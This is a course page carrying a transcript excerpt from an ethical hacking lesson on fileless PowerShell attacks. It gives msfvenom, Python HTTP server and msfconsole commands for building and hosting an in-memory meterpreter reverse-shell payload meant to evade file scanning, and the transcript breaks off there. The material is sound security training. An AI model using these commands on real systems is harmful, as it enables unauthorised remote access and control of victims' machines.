From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots

Unlock this course with a free trial

Join today to access over 25,300 courses taught by industry experts.

Fileless attacks with PowerShell

Fileless attacks with PowerShell

From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots

Start my 1-month free trial Buy for my team

Fileless attacks with PowerShell

- [Instructor] Fileless malware is the term used to describe an attack technique that runs without writing any malware to disk. By doing this, it avoids the risk of being detected by a file scan. PowerShell can be used to execute scripts directly in memory and is a popular choice for fileless attacks. An example of this is the PowerShell download string method, which downloads content from a remote location to a buffer in memory. First of all, let's create a PowerShell script payload. msfvenom -p windows/x64 /meterpreter_reverse_http and we'll make it PSH format. We'll set LHOST=10.0.2.12 for our IP address. LPORT=80 for HTTP and we'll output the file to m64.ps1 as a PowerScript shell. Okay, we now need to serve this on a website. So let's use our Python simple HTTP server. Python -M SimpleHTTPServer. Now we need to set up a meterpreter listener for PowerShell. So in our second terminal, we'll run sudo msfconsole,…

Contents